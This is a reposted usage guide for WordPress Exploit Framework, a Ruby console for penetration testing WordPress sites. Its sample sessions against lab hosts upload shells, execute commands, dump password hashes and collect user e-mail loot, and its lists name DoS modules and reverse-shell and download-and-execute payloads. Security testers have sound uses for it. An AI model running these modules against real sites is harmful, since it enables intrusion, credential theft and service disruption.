WordPress Exploit Framework - A Ruby Tool For Wordpress Penetration Testing


WordPress Exploit Framework is an open source framework that is designed to aid in the penetration testing of WordPress systems.


Requirements:

  •  Ruby >= 2.4.4


How To Install WordPress Exploit Framework

To install the latest stable build, run  gem install wpxf .

After installation, you can launch the WordPress Exploit Framework console by running  wpxf .

Debian Systems:

If you have issues installing WPXF's dependencies (in particular, Nokogiri), first make sure you have all the tooling necessary to compile C extensions:
sudo apt-get install build-essential patch

It's possible that you don't have important development header files installed on your system. Here's what you should do if you should find yourself in this situation:
sudo apt-get install ruby-dev zlib1g-dev liblzma-dev

If you are experiencing errors that indicate that  libcurl.dll  could not be loaded, you will need to ensure the latest libcurl binary is included in your Ruby bin folder, or any other folder that is in your environment's PATH variable.

The latest version can be downloaded from curl.haxx.se/download.html. As of 16/05/2016, the latest release is marked as  Win32 2000/XP zip 7.40.0 libcurl SSL . After downloading the archive, extract the contents of the bin directory into your Ruby bin directory (if prompted, don't overwrite any existing DLLs).


How To Use WordPress Exploit Framework

Start the WordPress Exploit Framework console by running  wpxf .

Once loaded, you'll be presented with the wpxf prompt, from here you can search for modules using the  search  command or load a module using the  use  command.

Loading a module into your environment will allow you to set options with the set command and view information about the module using  info .

Below is an example of how one would load the symposium_shell_upload exploit module, set the module and payload options and run the exploit against the target.
wpxf > use exploit/shell/symposium_shell_upload

[+] Loaded module: #<Wpxf::Exploit::SymposiumShellUpload:0x3916f20>

wpxf [exploit/shell/symposium_shell_upload] > set host wp-sandbox

[+] Set host => wp-sandbox

wpxf [exploit/shell/symposium_shell_upload] > set target_uri /wordpress/

[+] Set target_uri => /wordpress/

wpxf [exploit/shell/symposium_shell_upload] > set payload exec

[+] Loaded payload: #<Wpxf::Payloads::Exec:0x434d078>

wpxf [exploit/shell/symposium_shell_upload] > set cmd echo "Hello, world!"

[+] Set cmd => echo "Hello, world!"

wpxf [exploit/shell/symposium_shell_upload] > run

[-] Preparing payload...
[-] Uploading the payload...
[-] Executing the payload...
[+] Result: Hello, world!
[+] Execution finished successfully


Supported Commands:

  • back
Changes the context of the session back to before loading the current module.
wpxf [exploit/shell/admin_shell_upload] > back
wpxf >


  • check
Check if the currently loaded module can be used against the specified target.
wpxf [exploit/shell/admin_shell_upload] > check

[!] Target appears to be vulnerable

wpxf [exploit/shell/admin_shell_upload] >


  • clear
Clear the screen.

  • creds
List the credentials stored in the current workspace.
wpxf > creds

ID Host Username Password Type
-- --------------- -------- -------- -----
13 wordpress.vm:80 root toor plain
14 wordpress.vm:80 test plain

wpxf >


  • creds -d  [id] 
Delete the credential with the matching [id] number.
wpxf > creds -d 8

[+] Deleted credential 8

wpxf >


  • gset
Set an option value globally, so that the current module and all modules loaded afterwards will use the specified value for the specified option.
wpxf > gset host wordpress.vm

[+] Globally set the value of host to wordpress.vm

wpxf > use exploit/shell/admin_shell_upload

[+] Loaded module: #<Wpxf::Exploit::AdminShellUpload:0x3578af0>

wpxf [exploit/shell/admin_shell_upload] > show options

Module options:

Name Current Setting Required Description
------------------- --------------- -------- -------------------------------------------
host wordpress.vm true Address of the target host.
http_client_timeout 5 true Max wait time in seconds for HTTP responses
password true The WordPress password to authenticate with
port 80 true Port the remote host is listening on
proxy false Proxy address ([protocol://]host:port)
ssl false true Use SSL/HTTPS for all requests
target_uri / true Base path to the WordPress application
username true The WordPress username to authenticate with
verbose false true Enable verbose output
vhost false HTTP server virtual host

wpxf [exploit/shell/admin_shell_upload] >


  • gunset
Unset a global option set with the gset command.
wpxf > gunset host

[+] Removed the global setting for host

wpxf >


  • info
Display information about the currently loaded module.
wpxf [exploit/shell/admin_shell_upload] > info

Name: Admin Shell Upload
Module: exploit/shell/admin_shell_upload
Disclosed: 2015-02-21

Provided by:
rastating

Module options:

Name Current Setting Required Description
---------- --------------- -------- -------------------------------------------
host wordpress.vm true Address of the target host.
password toor true The WordPress password to authenticate with
port 80 true Port the remote host is listening on
proxy false Proxy address ([protocol://]host:port)
ssl false true Use SSL/HTTPS for all requests
target_uri / true Base path to the WordPress application
username root true The WordPress username to authenticate with
verbose false true Enable verbose output
vhost false HTTP server virtual host

Description:
This module will generate a plugin, pack the payload into it and upload it to
a server running WordPress; providing valid admin credentials are used.


wpxf [exploit/shell/admin_shell_upload] >


  • loot
List the loot collected from targets in the current workspace.
wpxf > loot

ID Host Filename Notes Type
-- --------------- ----------------------- ------------------------------------- ---------
1 wordpress.vm:80 2018-07-14_15-00-56.csv Registered users and e-mail addresses user list

All filenames are relative to /home/rastating/.wpxf/loot

wpxf >


  • loot -d  [id] 
Delete the loot item with the matching [id] number.
wpxf > loot -d 1

[+] Deleted item 1

wpxf >



  • loot -p  [id] 
Print the content of the loot item with the matching [id] number.
wpxf > loot -p 2

Email,Name
"lPBrOHC@mBeTjaAGGh.com","atgvrf"
"gSLzaYG@uZVUAeSJvj.com","dowzvc"
"AMfWgAH@uDNuULjBQv.com","efhkjv"
"halFIgH@CYqrzDzwQU.com","omquqt"
"root@wordpress.vm","root"

wpxf >


  • quit
Exit the WordPress Exploit Framework prompt.

  • rebuild_cache
Re-build the module cache.
wpxf > rebuild_cache

[!] Refreshing the module cache...

wpxf >


  • run
Run the currently loaded module.
wpxf [auxiliary/hash_dump/simple_ads_manager_hash_dump] > run

[-] Determining database prefix...
[-] Dumping user hashes...

Username Hash
-------- -----------------------------------
root $P$BqL7kZ\/A30CnAbIriSrXRmKvY9ynx80
ATgVrF $P$Bc5VwreNVctuXYwqKuN0IOWiDib79g.
DOWzVC $P$BwtOdeIGMW.jR7\/zfzMp.kc4FJcPwB.
OmQUqt $P$BOUcq9FWVxEyyrqyZNApW79kgPm7wq\/
eFhkJv $P$B1h9aF1cYdIBnAoh9F6NkchHXlTMpe.

[+] Execution finished successfully

wpxf [auxiliary/hash_dump/simple_ads_manager_hash_dump] >


  • set
Set an option value for the currently loaded module.
wpxf [exploit/shell/admin_shell_upload] > set host wordpress.vm

[+] Set host => wordpress.vm

wpxf [exploit/shell/admin_shell_upload] >


  • setg
Alias for gset.

  • search
Search for modules that contain one or more of the specified keywords.
wpxf > search rfi

[+] 3 Results for "rfi"

Module Title
-------------------------------------------------- ----------------------------------------
exploit/rfi/fast_image_adder_v1.1_rfi_shell_upload Fast Image Adder <= 1.1 RFI Shell Upload
exploit/rfi/flickr_picture_backup_rfi_shell_upload Flickr Picture Backup RFI Shell Upload
exploit/rfi/wp_mobile_detector_rfi_shell_upload WP Mobile Detector RFI Shell Upload

wpxf >


  • show advanced
Show the advanced options of the currently loaded module.
wpxf [exploit/shell/admin_shell_upload] > show advanced

Name: basic_auth_creds
Current setting:
Required: false
Description: HTTP basic auth credentials (username:password)

Name: follow_http_redirection
Current setting: true
Required: true
Description: Automatically follow HTTP redirections

Name: max_http_concurrency
Current setting: 20
Required: true
Description: Max number of HTTP requests that can be made in parallel (Min: 1, Max: 200)

Name: proxy_auth_creds
Current setting:
Required: false
Description: Proxy server credentials (username:password)

Name: user_agent
Current setting: Mozilla/5.0 (Macintosh; U; U; Intel Mac OS X 10_7_6 rv:6.0; en-US) AppleWebKit/533.49.6 (KHTML, like Gecko) Version/4.0.2 Safari/533.49.6
Required: false
Description: The user agent string to send with all requests

Name: verify_host
Current setting: true
Required: true
Description: Enable host verification when using HTTPS

Name: wp_content_dir
Current setting: wp-content
Required: true
Description: The name of the wp-content directory.


wpxf [exploit/shell/admin_shell_upload] >


  • show auxiliary
Show the list of available auxiliary modules.
wpxf > show auxiliary

[+] 58 Auxiliaries

Module Title
-------------------------------------- -----------------------------------------------------------
auxiliary/dos/load_scripts_dos WordPress "load-scripts.php" DoS
auxiliary/dos/long_password_dos Long Password DoS
auxiliary/dos/post_grid_file_deletion Post Grid <= 2.0.12 Unauthenticated Arbitrary File Deletion
auxiliary/dos/wp_v4.7.2_csrf_dos WordPress 4.2-4.7.2 - CSRF DoS

...

wpxf >


  • show exploits
Show the list of available exploits.
wpxf > show exploits

[+] 289 Exploits

Module Title
-------------------------------------------------------- --------------------------------------------
exploit/rfi/advanced_custom_fields_remote_file_inclusion Advanced Custom Fields Remote File Inclusion
exploit/rfi/fast_image_adder_v1.1_rfi_shell_upload Fast Image Adder <= 1.1 RFI Shell Upload
exploit/rfi/flickr_picture_backup_rfi_shell_upload Flickr Picture Backup RFI Shell Upload
exploit/rfi/gwolle_guestbook_remote_file_inclusion Gwolle Guestbook Remote File Inclusion
exploit/rfi/wp_mobile_detector_rfi_shell_upload WP Mobile Detector RFI Shell Upload

...

wpxf >


  • show options
Show the basic options of the currently loaded module.
wpxf [exploit/shell/admin_shell_upload] > show options

Module options:

Name Current Setting Required Description
------------------- --------------- -------- -------------------------------------------
host wordpress.vm true Address of the target host.
http_client_timeout 5 true Max wait time in seconds for HTTP responses
password true The WordPress password to authenticate with
port 80 true Port the remote host is listening on
proxy false Proxy address ([protocol://]host:port)
ssl false true Use SSL/HTTPS for all requests
target_uri / true Base path to the WordPress application
username true The WordPress username to authenticate with
verbose false true Enable verbose output
vhost false HTTP server virtual host

wpxf [exploit/shell/admin_shell_upload] >


  • unset
Unset an option set with the set command.
wpxf [exploit/shell/admin_shell_upload] > unset host

[+] Unset host

wpxf [exploit/shell/admin_shell_upload] >


  • unsetg
Alias for gunset.

  • use
Load the specified module into the current context.
wpxf > use exploit/shell/admin_shell_upload

[+] Loaded module: #<Wpxf::Exploit::AdminShellUpload:0x3af1100>

wpxf [exploit/shell/admin_shell_upload] >


  • workspace
List the available workspaces.
wpxf > workspace

[-] default (active)
[-] test

wpxf >


  • workspace  [name] 
Switch to the  [name]  workspace.
wpxf > workspace test

[+] Switched to workspace: test

wpxf >


  • workspace -a  [name] 
Add a new workspace.
wpxf > workspace -a wiki

[+] Added workspace: wiki

wpxf >


  • workspace -d [name] 
Delete the  [name]  workspace.
wpxf > workspace -d wiki

[+] Deleted workspace: wiki

wpxf >


Difference Between Auxiliary and Exploit Modules

Auxiliary modules do not allow you to run payloads on the target machine, but instead allow you to extract information from the target, escalate privileges or provide denial of service functionality.

Exploit modules require you to specify a payload which subsequently gets executed on the target machine, allowing you to run arbitrary code to extract information from the machine, establish a remote shell or anything else that you want to do within the context of the web server.


Available Payloads

  • bind_php: uploads a script that will bind to a specific port and allow WPXF to establish a remote shell.
  • custom: uploads and executes a custom PHP script.
  • download_exec: downloads and runs a remote executable file.
  • meterpreter_bind_tcp: a Meterpreter bind TCP payload generated using msfvenom.
  • meterpreter_reverse_tcp: a Meterpreter reverse TCP payload generated using msfvenom.
  • exec: runs a shell command on the remote server and returns the output to the WPXF session.
  • reverse_tcp: uploads a script that will establish a reverse TCP shell.




Source: www.effecthacking.com
WordPress Exploit Framework - A Ruby Tool For Wordpress Penetration Testing WordPress Exploit Framework -  A Ruby Tool For Wordpress Penetration Testing Reviewed by Anonymous on 1:29 PM Rating: 5